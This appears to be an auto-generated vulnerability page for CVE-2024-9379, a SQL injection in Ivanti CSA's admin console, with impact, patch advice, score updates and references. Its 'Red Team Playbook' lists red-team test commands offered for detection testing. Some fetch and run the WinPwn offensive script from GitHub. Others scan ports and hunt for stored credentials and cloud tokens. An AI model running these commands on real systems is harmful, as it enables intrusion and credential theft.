CVE-2024-9379
Overview
This vulnerability is a SQL injection flaw located in the administrative web console of Ivanti CSA (Cloud Services Appliance) versions prior to 5.0.2. The root cause is improper sanitization of user-supplied input within SQL queries executed by the admin interface, allowing crafted input to manipulate the backend database commands. The affected component is the admin web console, which processes SQL statements based on authenticated admin user interactions.
Vulnerability Description
SQL injection in the admin web console of Ivanti CSA before version 5.0.2 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.
Impact
An attacker with administrative credentials can exploit this vulnerability to execute arbitrary SQL commands on the backend database, potentially modifying, deleting, or extracting sensitive data. This level of access allows full control over the database content and integrity, which can lead to data breaches, unauthorized data manipulation, and disruption of system operations. Exploitation requires a valid admin account, thus limiting the attack surface to authenticated users with elevated privileges.
Solution
Ivanti has addressed this vulnerability in Ivanti CSA version 5.0.2. Administrators are advised to upgrade to version 5.0.2 or later as detailed in the Ivanti security advisory available at https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381. No specific workarounds are provided; applying the vendor patch is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the admin web console of Ivanti's Endpoint Manager Cloud Services Appliance is a critical SQL injection flaw that allows an authenticated attacker with administrative privileges to execute arbitrary SQL statements. This type of vulnerability arises when user input is improperly sanitized, allowing malicious SQL code to be injected into queries executed by the database. In this case, the flaw is particularly concerning due to the elevated privileges of the affected users, which can lead to severe consequences if exploited. Attackers can manipulate the database to extract sensitive information, modify records, or even delete critical data, thereby compromising the integrity and confidentiality of the system.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker, who already possesses admin access, could craft a malicious SQL query and input it into the admin web console. This could be done through various forms, such as input fields or URL parameters that are processed by the backend database. Once the SQL injection is successful, the attacker can leverage this access to perform a range of malicious activities, including data exfiltration, privilege escalation, or even complete system takeover. The ability to run arbitrary SQL statements means that the attacker can manipulate the database in ways that were not intended by the original application design, leading to potential data breaches or service disruptions.
The real-world impact of such a vulnerability can be profound, particularly for organizations that rely heavily on the Ivanti Endpoint Manager for managing their IT infrastructure. A successful exploitation could lead to unauthorized access to sensitive data, including personally identifiable information (PII), financial records, or proprietary business information. The business risks associated with such a breach are significant, encompassing legal liabilities, regulatory fines, reputational damage, and loss of customer trust. Organizations may also face operational disruptions as they scramble to contain the breach and mitigate its effects, leading to potential financial losses and a decline in market position.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and code reviews, can help identify and remediate vulnerabilities before they can be exploited. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering and monitoring HTTP requests to detect and block malicious input. Furthermore, organizations should ensure that they are running the latest version of the Ivanti Endpoint Manager, as updates often include critical security patches that address known vulnerabilities. Additionally, implementing strict access controls and monitoring user activity can help detect unusual behavior that may indicate an attempted exploitation of the vulnerability.
In conclusion, the SQL injection vulnerability in the admin web console of Ivanti's Endpoint Manager Cloud Services Appliance poses a significant threat to organizations that utilize this product. The potential for unauthorized access to sensitive data and the subsequent business risks highlight the importance of proactive security measures. By adopting comprehensive detection and mitigation strategies, organizations can better protect themselves against the exploitation of such vulnerabilities and safeguard their critical assets.
Recent adjustments to the CVSS and EPSS scores for CVE-2024-9379 reflect a refined understanding of its exploitability and impact. The CVSS score was lowered from 7.2 to 6.5, indicating a reassessment of the vulnerability’s severity based on updated contextual factors, such as the requirement for authenticated admin privileges and the limited scope of exploitation. Concurrently, the EPSS score experienced a modest decline, signaling a slight decrease in the probability of exploitation in the near term. CSURFACE threat intelligence has not detected any new exploit activity or proof-of-concept developments, and our telemetry shows no marked escalation in attempts targeting this vulnerability. The inclusion of CVE-2024-9379 in the Known Exploited Vulnerabilities (KEV) catalog underscores its relevance but does not currently correlate with increased exploitation trends or ransomware group involvement. For defenders, this updated risk profile suggests a medium-level threat that remains important to monitor but does not presently warrant heightened alarm. The recalibrated scores and stable exploit landscape allow organizations to prioritize remediation efforts accordingly, maintaining vigilance without immediate urgency.
Update 2 — June 09, 2026
The CVSS score adjustment for CVE-2024-9379 from 6.5 to 7.2 reflects a reassessment of the vulnerability’s potential impact and exploitability, now categorizing it as a higher-severity risk. This change coincides with its recent inclusion in the Known Exploited Vulnerabilities (KEV) catalog, signaling increased recognition of its threat relevance within the security community. Although our telemetry continues to show no marked escalation in active exploitation attempts or ransomware group involvement, the elevated CVSS score and high EPSS percentile underscore a sustained potential for impactful attacks if leveraged. For defenders, this updated risk profile indicates that while immediate exploitation activity remains stable, the vulnerability warrants closer attention and prioritization in patch management cycles due to its confirmed presence in KEV and the inherent risks associated with authenticated SQL injection in administrative interfaces.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager Cloud Services Appliance | All |
cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9379 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-9379 |